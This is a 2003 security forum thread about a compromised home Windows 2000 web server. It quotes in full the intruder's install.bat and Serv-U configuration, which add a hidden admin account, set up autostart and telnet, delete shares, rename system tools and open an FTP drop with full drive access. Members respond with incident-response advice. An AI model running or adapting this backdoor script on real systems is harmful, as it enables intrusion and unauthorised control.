Hacked !!!!!!

Printable View

Show 40 post(s) from this thread on one page

February 18th, 2003, 05:03 PM
KapperDog

Hacked !!!!!!

Hey guys. KapperDog here. Some of you may remember me. I've been a member here for a few years and I read more than I post.

Need a favor, please

I am playing with a web server I set up on my home PC. It runs Win2KPro, Savant Web Server and BulletProof FTP.

The FTP was not running at the time of the hack but Savant was.

I'm not sure if I caught him in progress or if he just left a clue behind by accident but, this morning when I checked the box, it had a CMD window open and this is what was in the box.

Sure looks like I was hacked to me. LOL

Can anyone tell me what damage was done and (most importantly) am I still compromised.

Thanks for everything.

Hey, where's Hogfly? How's his gas? LMAO

Anyway......

Code:

C:\WINNT\system32\spool\prtprocs\w32x86>set key=1 C:\WINNT\system32\spool\prtprocs\w32x86>ver | find "2000" 1>nul C:\WINNT\system32\spool\prtprocs\w32x86>if not errorlevel 1 set key=2 C:\WINNT\system32\spool\prtprocs\w32x86>c: C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\ prtprocs\w32x86\svchost.exe C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\ prtprocs\w32x86\servudaemon.ini C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\ prtprocs\w32x86\install.bat C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\ prtprocs\w32x86\dump0n.txt C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\ prtprocs\w32x86\ohq.exe C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\ prtprocs\w32x86\JAsfv.dll C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\ prtprocs\w32x86\JAsfv.ini C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\ prtprocs\w32x86\TzoLibr.dll C:\WINNT\system32\spool\prtprocs\w32x86>net user GLoB peupo3nn/add /yes The user name could not be found. More help is available by typing NET HELPMSG 2221. C:\WINNT\system32\spool\prtprocs\w32x86>net LOCALGROUP administrators GLoB /add There is no such global user or group: GLoB. More help is available by typing NET HELPMSG 3783. C:\WINNT\system32\spool\prtprocs\w32x86>net group "Domain Admins" GLoB /add This command can be used only on a Windows 2000 Domain Controller. More help is available by typing NET HELPMSG 3515. C:\WINNT\system32\spool\prtprocs\w32x86>echo REGEDIT4 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros oft\Windows\CurrentVersion\Run] 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo "MDM"="c:\winnt\system32\spool\prt procs\w32x86\svchost.exe" 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC ontrolSet\Control\Lsa\] 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo "restrictanonymous"=dword:00000002 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros oft\TelnetServer\1.0\] 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo "NTLM"=dword:00000001 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlS et001\Services\TlntSvr\] 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo "Start"=dword:00000002 1>>ins.re g C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC ontrolSet\Services\LanmanServer\Parameters] 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo "AutoShareServer"=dword:00000000 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo "AutoShareWks"=dword:00000000 1>> ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros oft\Windows NT\CurrentVersion\Winlogon] 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo "DontDisplayLastUserName"=dword:000 00001 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC ontrolSet\Services\lanmanserver\parameters] 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>echo "RestrictNullSessAccess"=dword:0000 0001 1>>ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>regedit /S ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>del ins.reg C:\WINNT\system32\spool\prtprocs\w32x86>svchost.exe /i C:\WINNT\system32\spool\prtprocs\w32x86>net stop Serv-U The Serv-U FTP Server service is not started. More help is available by typing NET HELPMSG 3521. C:\WINNT\system32\spool\prtprocs\w32x86>net start Serv-U The Serv-U FTP Server service is starting. The Serv-U FTP Server service was started successfully. C:\WINNT\system32\spool\prtprocs\w32x86>net stop tlntsvr The Telnet service is not started. More help is available by typing NET HELPMSG 3521. C:\WINNT\system32\spool\prtprocs\w32x86>net start tlntsvr The Telnet service is starting. The Telnet service was started successfully. C:\WINNT\system32\spool\prtprocs\w32x86>net stop "messenger" The Messenger service is not started. More help is available by typing NET HELPMSG 3521. C:\WINNT\system32\spool\prtprocs\w32x86>net stop "netbios" The NetBIOS Interface service was stopped successfully. C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete C$ /y C$ was deleted successfully. C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete D$ /y This shared resource does not exist. More help is available by typing NET HELPMSG 2310. C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete E$ /y This shared resource does not exist. More help is available by typing NET HELPMSG 2310. C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete F$ /y This shared resource does not exist. More help is available by typing NET HELPMSG 2310. C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete ADMIN$ Users have open files on ADMIN$. Continuing the operation will force the files closed. Do you want to continue this operation? (Y/N) [N]:

The cursor is still flashing at this prompt waiting for a reply.

Any advice?

Thanks again, guys.
February 18th, 2003, 05:32 PM
Tiger Shark

well......

Busy little ratbag wasn't he......<s>

Unfortunately you don't seem to have all the activity..... The command history buffer must have begun to overwrite itself..... You do have a few clues though that me help you clean up without a complete format and reinstall.

His password for this hack is peupo3nn

much info and stuff he did is in C:\WINNT\system32\spool\prtprocs\w32x86

There is a batch file in the w32x86 dir called install.bat that is worth looking through.....

There is a txt file called Dump0n.txt that is also worth a close look.

servudaemon.ini might also show some interesting info as would JAsfv.ini

You have a definitive list of the registry changes he made....Undo them

close the services he started

dunno why he would stop netbios..... That's an odd one.....

He deleted your administrative shares.... you should probably leave them deleted unless you use them.

It's up to you if you simply delete the files he put in C:\WINNT\system32\spool\prtprocs\w32x86 or just keep them on a floppy to experiment with.

I'd also put a packets sniffer watching the machine for a few days
February 18th, 2003, 05:36 PM
KapperDog

Well, it definitely looks like a real hack. It looks like he installed ServU ftp on my box.

This is the first time I've been hacked. Kinda fun. hehe

Although, I want to make sure my entire LAN is not in danger. It would appear he intends to return and steal, not just destroy. (Otherwise, I assume I would have formated HDD's by now.

Hmmmmm? maybe, I should lay in wait. LOL Unfirtunately, I don't know as much as I should about this stuff.

Anyway, I hope you don't mind my multiple posts but, I'm going to post what I find as I find it. If someone want to pick up and help out, I sure would be greatful. Thanks again.

Here is the servUDaemon.ini from the Seru FTP install

Code:

[GLOBAL] Version=3.0.0.17 RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBDOq4z0PJw8nAgAERHVtcAhQdWJAU3RybwdFQ0xpUFNF ProcessID=596 MaxNrUsers=10 CheckAnonPass=1 DirCacheEnable=0 AntiHammer=1 AntiHammerTries=10 AntiHammerBlock=1800 PacketTimeOut=300 [EXTERNAL] EventHookDLL1=JAsfv.dll [DOMAINS] Domain1=0.0.0.0||6969|0nlineHQ|1 [Domain1] ReplyHello=(¯`·._.·[ 0nline.HQ ]·._.·´¯) ReplyHelp=(¯`·._.·[ No Help avering ]·._.·´¯) ReplyNoAnon=(¯`·._.·[ No an0nym0us acc0unt ]·._.·´¯) ReplyNoCredit=(¯`·._.·[ No en0ught Credits ]·._.·´¯) ReplySYST=(¯`·._.·[ Hax0r = 0nline.HQ CreW ]·._.·´¯) ReplyTooMany=(¯`·._.·[ 421: ToO MuCh LeeCheRz / BaCk s00n ]·._.·´¯) ReplyDown=(¯`·._.·[ Offline : BaCk s00n ]·._.·´¯) ReplyOffline=(¯`·._.·[ Offline : BaCk s00n ]·._.·´¯) LogSystemMes=0 LogSecurityMes=0 LogGETs=0 LogPUTs=0 MaxNrUsers=10 User1=admin|1|0 SignOn=c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt User2=fxp|1|0 User3=leech|1|0 [USER=admin|1] Password=vv3C067E6E3AD1C12C6D5CF9BE14CD5B19 HomeDir=c:\ AlwaysAllowLogin=1 TimeOut=1000020 Maintenance=System Access1=c:\|RWAMELCDP Access1=c:\|RWAMELCDP Access2=d:\|RWAMELCDP Access3=e:\|RWAMELCDP Access4=f:\|RWAMELCDP Access5=g:\|RWAMELCDP Access6=h:\|RWAMELCDP Access7=i:\|RWAMELCDP Access8=j:\|RWAMELCDP Access9=k:\|RWAMELCDP Access10=l:\|RWAMELCDP Access11=m:\|RWAMELCDP Access12=n:\|RWAMELCDP Access13=o:\|RWAMELCDP Access14=p:\|RWAMELCDP Access15=q:\|RWAMELCDP Access16=r:\|RWAMELCDP Access17=s:\|RWAMELCDP Access18=t:\|RWAMELCDP Access19=u:\|RWAMELCDP Access20=v:\|RWAMELCDP Access21=w:\|RWAMELCDP Access22=x:\|RWAMELCDP Access23=y:\|RWAMELCDP Access24=z:\|RWAMELCDP [USER=fxp|1] Password=rjAF7C43174907EE9645895D981D10A046 HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro RelPaths=1 TimeOut=600 Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RWAMLCDP [USER=leech|1] Password=khD56952C34B3B066BF0F400BD3D0B2B97 HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro RelPaths=1 TimeOut=600 Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RLP

Thanks Tiger. I was looking thru that directory while you were posting. Lottsa neat stuff.

Most interesting is the install.bat file.

So far, all I have done is rename all .exe's and .bat's to .bakexe and .bakbat.

I don't want to delete anything because this is a real opportunity for me to learn but, I'm afraid. LOL

I guess, the 1 thing I should focus on first is how he got in and how to stop him (and other) from returning the same way.

Any suggestions on this? Remember, I'm a newbie. LOL

I have 10 boxes on this LAN and I don't want to loose all 10 of them. LOL

Hmmm, I may be in more trouble than I thought. Well, we shall see.

Anyway, the install.bat

C:\WINNT\system32\spool\prtprocs\w32x86

Code:

set key=1 ver | find "2000" > nul if not errorlevel 1 set key=2 c: attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll net user GLoB peupo3nn/add /yes net LOCALGROUP administrators GLoB /add net group "Domain Admins" GLoB /add echo REGEDIT4 1>>ins.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg echo "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg echo "restrictanonymous"=dword:0000000%key% >> ins.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> ins.reg echo "NTLM"=dword:00000001 >> ins.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] >> ins.reg echo "Start"=dword:00000002 >> ins.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg echo "AutoShareServer"=dword:00000000>> ins.reg echo "AutoShareWks"=dword:00000000>> ins.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> ins.reg echo "DontDisplayLastUserName"=dword:00000001>> ins.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg echo "RestrictNullSessAccess"=dword:00000001>> ins.reg regedit /S ins.reg del ins.reg svchost.exe /i net stop Serv-U net start Serv-U net stop tlntsvr net start tlntsvr net stop "messenger" net stop "netbios" net share /delete C$ /y net share /delete D$ /y net share /delete E$ /y net share /delete F$ /y net share /delete ADMIN$ net share /delete IPC$ net stop "Remote Registry Service" net stop "Computer Browser" net stop "REMOTE PROCEDURE CALL" net stop "REMOTE PROCEDURE CALL SERVICE" net stop "Remote Access Connection Manager" net stop "telnet" mkdir c:\winnt\Recycled\.glob cd c:\winnt\system32\ ren net.exe neo.exe ren tftp.exe neo2.exe ren ftp.exe neo3.exe ren at.exe neo4.exe c:\winnt\system32\spool\prtprocs\w32x86\.glob\svchost.exe /u /h
February 18th, 2003, 05:53 PM
Tiger Shark

I've heard of the HQ CreW somewhere before..... I just can't remmber where......
February 18th, 2003, 06:06 PM
KapperDog

Code:

C:\WINNT\system32\spool\prtprocs\w32x86 Directory of C:\WINNT\system32\spool\prtprocs\w32x86 02/17/2003 11:23p <DIR> . 02/17/2003 11:23p <DIR> .. 02/02/2003 03:44p 1,685 dump0n.txt 02/07/2003 07:54p 2,541 install.bakbat 01/16/2002 08:07p 69,632 JAsfv.dll 02/06/2003 08:24p 2,739 JAsfv.ini 02/07/2003 02:16p 632,809 ohq.bakexe 02/17/2003 03:53p 2,091 ServUDaemon.ini 02/17/2003 03:44p 584 ServUStartUpLog.txt 12/07/1999 07:00a 6,928 sfmpsprt.dll 02/17/2003 03:54p <DIR> stro 02/04/2003 08:45p 1,930,752 svchost.bakexe 10/16/2002 09:07p 36,864 TzoLibr.dll 10 File(s) 2,686,625 bytes 3 Dir(s) 108,350,550,016 bytes free C:\WINNT\system32\spool\prtprocs\w32x86>

dumpOn.txt

Code:

¨¨°o.O0Oo+====================================+oO0O.o°¨¨ <-·´¯`·._.·´¯) Info Utilisateur (¯`·._.·´¯`·-> --={ Tu es sur le disque %Disk --={ Ton ip %IP --={ Utilisateurs Connectés: %UNow --={ Nombre d'utilisateurs Acceptés: %MaxUsers --={ Nombre d'utilisateurs connectés depuis le lancement du serveur: %UAll --={ Utilisateurs connectés sur le serveur durant les dernieres 24H: %U24h ¨¨°o.O0Oo+====================================+oO0O.o°¨¨ <-·´¯`·._.·´¯) Descriptif Serveur (¯`·._.·´¯`·-> --={ Heure Local %Time --={ Date Local %Date --={ Le serveur est lancé depuis --={ %ServerDays Jours, %ServerHours Heures, %ServerMins Mins, %ServerSecs Secs ¨¨°o.O0Oo+====================================+oO0O.o°¨¨ <-·´¯`·._.·´¯) Statistique Serveur (¯`·._.·´¯`·-> --={ Espace Disque Disponible: %DFree Ko --={ Téléchargement Total: %ServerKbDown Ko --={ Envoie Total: %ServerKbUp Ko --={ Bande Passante Moyenne: %ServerAvg Ko/sec --={ Bande Passante Actuelle: %ServerKBps Ko/sec --={ Nombres de Fichiés Téléchargés: %FDown --={ Nombres de Fichiés Envoyés: %FUp ¨¨°o.O0Oo+====================================+oO0O.o°¨¨ <-·´¯`·._.·´¯) Ratio Stat Serveur (¯`·._.·´¯`·-> --={ Ratio Up : %RatioUp Ko --={ Ratio Down : %RatioDown Ko --={ Credits restant: %RatioCredit ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
February 18th, 2003, 06:11 PM
Tiger Shark

Kapper: Ya know what's funny....... I was looking at the first printout you posted and thinking to myself "this is scripted".... LOL..... Now I see the install bat it's the exact set of commands in the same order so this was the install bat running.

You are right.... We need to find the way in.... What is the architecture of the network.... like

Internet -> Firewall -> LAN
|
v
DMZ -> Public services

I need to understand where your vulnerabilities are since clearly he had already copied all the files into place and the install bat prior to him running it and there is no evidence of how or where..... What services are available publicly? Kinda everything you can tell me?

If you don't feel comfy doing it that publicly....pm me with the info.
February 18th, 2003, 06:17 PM
noODle

Since he started an FTP service his plan is probably to use your box as some sort of warez server.
I would go with the intrusion detection, packet capturing software.
BTW do you have timestamps for when this happened ?
Do you run a firewall ? (You should)
If you run a firewall you may want to examine the logs. This could give you some info on the whereabouts of the misschief but he is probably proxie-chained.
Also the telnet service gets started. He might have continued his quest from telnet and forgot to terminate the command session.

Try disconnecting the other puters on your network if it is possible and monitor the traffic. This way maybe you can catch him while he is at it.

Just some general advice:
I googled for 'savant webserver' without the quotes and immediatly got atleast ten links to vulnarabilities in it.
Are you aware of this ?
Do you have the latest patches installed ?

Hope this will help.
February 18th, 2003, 06:23 PM
KapperDog

I don't have a prob doing it pulicly. This is how we all learn to deal with these little kiddies. LOL

This should be good for me (thanks to you). Hopefully, if we keep in in the forum, others will learn too.

OK, I'll describe the network as best I can.

Since we're starting at the begining, maybe you could give me a little immediate advice.

Should I shut the serber down? It's only hosting a couple ebay auctions and some other fun stuff. It's there for me to play with and learn. I would like to leave it up but if you say, I should take it down, I will.

The danger is that I have my home network set up to this and, although, there is nothing of interest there, there is archival data that I would not want to loose.

Does he seem to have access to my entire LAN?

OK. Thanks.. my turn

P4 2.4 /512k RAM/Win2KPro/SP2/Savant Web Server

Cable ISP/Linksys Router (pass not admin)/IP assigned to servere and IP placed in DMZ

Hmmm, I'll bet you're going to slap my wrist for that one. I'll bet I should have done individual port forwarding for the web (80) and the FTP (whatever)

Well, that's what I've got. If you need more, ask.

I hope this will be an enjoyable and learning experience for us all and, I want to say thanks in advance for any participation.

Here's the install.bat

Code:

set key=1 ver | find "2000" > nul if not errorlevel 1 set key=2 c: attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll net user GLoB peupo3nn/add /yes net LOCALGROUP administrators GLoB /add net group "Domain Admins" GLoB /add echo REGEDIT4 1>>ins.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg echo "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg echo "restrictanonymous"=dword:0000000%key% >> ins.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> ins.reg echo "NTLM"=dword:00000001 >> ins.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] >> ins.reg echo "Start"=dword:00000002 >> ins.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg echo "AutoShareServer"=dword:00000000>> ins.reg echo "AutoShareWks"=dword:00000000>> ins.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> ins.reg echo "DontDisplayLastUserName"=dword:00000001>> ins.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg echo "RestrictNullSessAccess"=dword:00000001>> ins.reg regedit /S ins.reg del ins.reg svchost.exe /i net stop Serv-U net start Serv-U net stop tlntsvr net start tlntsvr net stop "messenger" net stop "netbios" net share /delete C$ /y net share /delete D$ /y net share /delete E$ /y net share /delete F$ /y net share /delete ADMIN$ net share /delete IPC$ net stop "Remote Registry Service" net stop "Computer Browser" net stop "REMOTE PROCEDURE CALL" net stop "REMOTE PROCEDURE CALL SERVICE" net stop "Remote Access Connection Manager" net stop "telnet" mkdir c:\winnt\Recycled\.glob cd c:\winnt\system32\ ren net.exe neo.exe ren tftp.exe neo2.exe ren ftp.exe neo3.exe ren at.exe neo4.exe c:\winnt\system32\spool\prtprocs\w32x86\.glob\svchost.exe /u /h

noodle. I have his IP from the Savant log. 80.14.79.43

SamSpade didn't give up much. lol

And, I'm pretty sure that the Linksys router keeps a log by default. I just started playing as a webserver and most of this is pretty new to me.

As far as Savant, I am using version 3.1

Like I said, I just put all this up a few weeks ago and I used all current releases so, I believe I have the latest patches for everything. I'll do that same Google search and see what I find. Thanks for the tip.
February 18th, 2003, 06:32 PM
DjM

This is just my opinion, but if you can divorce this box from the rest of your servers, I'd leave it up and treat it like a honeypot. If it's up, you may be able to catch him/her red-handed and be able to trace the attack. Again, if this is going to put your other systems at risk, you may want to take it off the wire.

Cheers:
February 18th, 2003, 06:35 PM
Moose69

I don't have much to tell you about your network's vulnerabilities (I'm just learning) but you DEFINATELY should back up all data you care about now if you haven't already got it backed up. If you haven't got it backed up already, the intruder might have already corrupted it.
February 18th, 2003, 06:35 PM
qwerty_smith

u could always change his scripts a little and watch him fumble next time.

only thing you SHOULD have in C:\WINNT\system32\spool\prtprocs\w32x86 is Winprint.dll

If you run IIS, svchost.exe could be W32.bluecode.worm. check these sites for more info....
http://securityresponse.symantec.com...code.worm.html
http://www.microsoft.com/technet/tre...n/ms00-078.asp

and here's another guy who may have similar problems...
http://archives.neohapsis.com/archiv...2-q2/0121.html

interesting...
from http://www.serv-u.com/

Quote:

Serv-U contains many "hooks" that allow other developers to easily write their own addon utilities, tools, and DLLs to extend the functionality of Serv-U.

Quote:

With the TZO Dynamic DNS Service, you can bind a domain name to a dynamic IP address. Serv-U 3.1 supports this service allowing Serv-U to use this domain name for it's connection address and PASV data transfers.
February 18th, 2003, 06:36 PM
Noia

he was trying to root you, to use you as a XDCC or some other kind of file server,,,I suggest you take a bood look around you system for .zip .tar .avi .rar and such, they may have uploaded some files already...

hope you get it sorted out...

- Noia
February 18th, 2003, 06:38 PM
DjM

Quote:

noodle. I have his IP from the Savant log. 80.14.79.43

This is what my trace had to say about the IP:

inetnum: 80.14.79.0 - 80.14.79.255
netname: IP2000-ADSL-BAS
descr: BSTLN103 Toulon Bloc1
country: FR
admin-c: WITR1-RIPE
tech-c: WITR1-RIPE
status: ASSIGNED PA
remarks: for hacking, spamming or security problems send mail to
remarks: [email protected] AND [email protected]
remarks: for ANY problem send mail to [email protected]
mnt-by: FT-BRX
changed: [email protected] 20020214
source: RIPE

It's coming out of France somewhere.

Cheers:
February 18th, 2003, 06:48 PM
qwerty_smith

i thought it was a french job... this IS french, right?

Quote:

¨¨°o.O0Oo+====================================+oO0O.o°¨¨

<-·´¯`·._.·´¯) Info Utilisateur (¯`·._.·´¯`·->

--={ Tu es sur le disque %Disk
--={ Ton ip %IP
--={ Utilisateurs Connectés: %UNow
--={ Nombre d'utilisateurs Acceptés: %MaxUsers
--={ Nombre d'utilisateurs connectés depuis le lancement du serveur: %UAll
--={ Utilisateurs connectés sur le serveur durant les dernieres 24H: %U24h

¨¨°o.O0Oo+====================================+oO0O.o°¨¨

<-·´¯`·._.·´¯) Descriptif Serveur (¯`·._.·´¯`·->

--={ Heure Local %Time
--={ Date Local %Date
--={ Le serveur est lancé depuis
--={ %ServerDays Jours, %ServerHours Heures, %ServerMins Mins, %ServerSecs Secs

¨¨°o.O0Oo+====================================+oO0O.o°¨¨

<-·´¯`·._.·´¯) Statistique Serveur (¯`·._.·´¯`·->

--={ Espace Disque Disponible: %DFree Ko
--={ Téléchargement Total: %ServerKbDown Ko
--={ Envoie Total: %ServerKbUp Ko
--={ Bande Passante Moyenne: %ServerAvg Ko/sec
--={ Bande Passante Actuelle: %ServerKBps Ko/sec
--={ Nombres de Fichiés Téléchargés: %FDown
--={ Nombres de Fichiés Envoyés: %FUp

¨¨°o.O0Oo+====================================+oO0O.o°¨¨
February 18th, 2003, 06:57 PM
noODle

Looks like he uses ADSL.
This could mean that the person has hacked you from his own home computer (which would be stupid) or he has allready rooted that box.
I would definitly send the abuse and the postmaster a high priority mail.
They may still have logs of what happened and this way the person will be caught allready.
If you have no 'critical' data on your server I would keep the box running and install some sort of packet sniffer or other monitoring software and watch this closely.

Hope this helps.

O yeah, you offcourse should keep you box up to date. Win 2k has service pack 3 allready and even some critical patches after that one.

Cheers.

noODle
February 18th, 2003, 07:08 PM
KapperDog

I believe the little bastard is as busy as a bee loading files to me right now.

How can I tell?
February 18th, 2003, 07:14 PM
DjM

Is the FTP service running? I thought you shut it down.

Anyways, how's your disk space, this is one way to tell if files are being uploaded, if your disk space is decreasing (a lot) then he's likely pushing files to you. Check the directories he created in his install process.

Cheers:
February 18th, 2003, 07:19 PM
noODle

Use 'netstat -an 5' from a command line interface to monitor active connections. This will give you the IP's of computers you are connected with as well as the port used for the session.
Use netstat -s for statistics on a per protocol basis.

The cracker has renamed some proggies on your box.
Rename them back to the original and use 'net share' to monitor what is shared on your box
February 18th, 2003, 07:21 PM
KapperDog

Like I said, I'm not very good at this sort of thing but, I used the Win file search and looked for files last accesed by date and used yesterday till tomorrow as the dates

Saw a new-this-day.gz and a new-this-week.gz

Little rat is uploading stuff to my root as we speak. I wish I could smoke this sucker.
February 18th, 2003, 07:23 PM
nebulus200

Just taking a very quick look through this thread and a couple of things come to mind. One, on the question of 'why would he disable netbios, delete admin shares', alot of times hackers will tighten up the box and fix how they got in to prevent others from doing the same...probably something he does by default...You said this box was outside in a DMZ...you did have netbios/null logon turned off right?

Also noticed that those commands are under spool, which makes me wonder if maybe he did something to exploit the NULL.printer thing (this is pretty old though). When was the last time you patched the box and IIS?

You say you have a 10 computer LAN setup at home. You have a PC that is unix? You might could set it out there in the DMZ (remove the IP or set it to something wrong so nobody can get to it). Then where the server is, connect it to a HUB (not a switch), connect the Unix box to the hub, then connect your router to the hub (might have to cross this over or use a uplink port for this connection). You should then be able to see any network traffic heading to the compromised box.

Could you please answer the following:

1) What are you running on the box? IIS? Any other services ? Take a look at Control Panel -> Administrative Tools -> Services, Are you running server, workstation, remote registry ?

2) When was the last time you patched XP? When was the last time you patched IIS (I am assuming you are running this)?

3) Have you looked in winnt/system32/logs ?

/nebulus

EDIT: Cleaned up a couple of grammatical booboos.
February 18th, 2003, 07:34 PM
DjM

Retaliation is likely not the smart thing to do here (remember, he got you once, next time he might be destructive). I recommend, if you have had enough of the little bugger, put in a firewall rule to completely drop his IP ( or the whole subnet if you want). Take a small snapshot of your firewall log and send it off to [email protected] and let them take care of him. You have got enough to do just cleaning up his mess.

Good Luck.

Cheers:
February 18th, 2003, 07:39 PM
KapperDog

netstat only shows 1 established right now.

TCP 192.168.1.200:445 24.193.235.232:1791

That mean anything to anyone?
February 18th, 2003, 07:59 PM
qwerty_smith

port 445
microsoft-ds 445/tcp Microsoft-DS
microsoft-ds 445/udp Microsoft-DS
looks like some vulnerabilities... Dos attacks, etc.
http://www.dshield.org/port_report.php?port=445
http://archives.neohapsis.com/archiv...2-q2/0025.html
port 445 is also used by Nimda

port 1971
ea1 1791/tcp EA1
ea1 1791/udp EA1

24.193.0.0 - 24.193.255.255
ROADRUNNER-NYC
13241 Woodland Park Road
Herndon, VA, 20171
US
February 18th, 2003, 08:07 PM
Tiger Shark

Kapper:

To be honest at this point, disconnect the box from the internet. No offence but you seem to be a tad out of your depth. I have been busy and still am but I need to reread the whole thread. It seems like you are not firewalled, (but I might have missed that), and that it is possible he still has control. That would put your other boxes at risk too if they already haven't been "jumped"

Let me look through and I'll see if we can chose the most efficient course of action - or maybe play with them if we can secure the rest of the network...... ;)
February 18th, 2003, 08:09 PM
str34m3r

Port 445 is Microsoft's way of running SMB over TCP/IP instead of using 3 ports to do it as they had before. There's a good explanation of it here:

http://ntsecurity.nu/papers/port445/

What are the file sizes of those gz files you mentioned... If they're relativelyt small, could you post them here for us to look at?

EDIT: TigerShark is probably right. At this point, it's looking more and more like we'll have to figure this out from a forensics point of view rather than a observer point of view.
February 18th, 2003, 08:16 PM
KapperDog

I have been sitting here thinking the same thing.

I need to go to work for a few hours and I hate to leave this unattended. And, you are right. I am definitely out of my depth but, this is why I set up a web server. So, I could learn about how this type of stuff happens. Heaven forbid I should learn this stuff on my corporate web site or a customers. (If I had one. LOL)

I want to learn. That's the whole idea.

I believe he has comprimised my web server because I have it in the DMZ (no software firewall). I don't run a software firewall since I installed the router. When I set up a box in the DMZ I guess I should have added a software firewall?

I suppose I should install ZA or TPF on the web server.

For now, I will shut down the web server. :(

I'm going to also, remove the IP from the DMZ on my router.

I'll be back in a few hours.

Thank you all very much. Doesn't look liike AO has changed much since I hung around. Still a great group. Is JP still in charge?

Hogfly? MsMittens? Negative? Well, I'll reminise later. LOL

I'll be back in a few hours.
February 18th, 2003, 08:33 PM
noODle

Once you get back online read the following thread:
How to Lock Down Your WinXP Box...
Many things apply to other NT based machines as well so don't be fooled by the title.

Hope you have logged some off that traffic and got in touch with the abuse mail person.
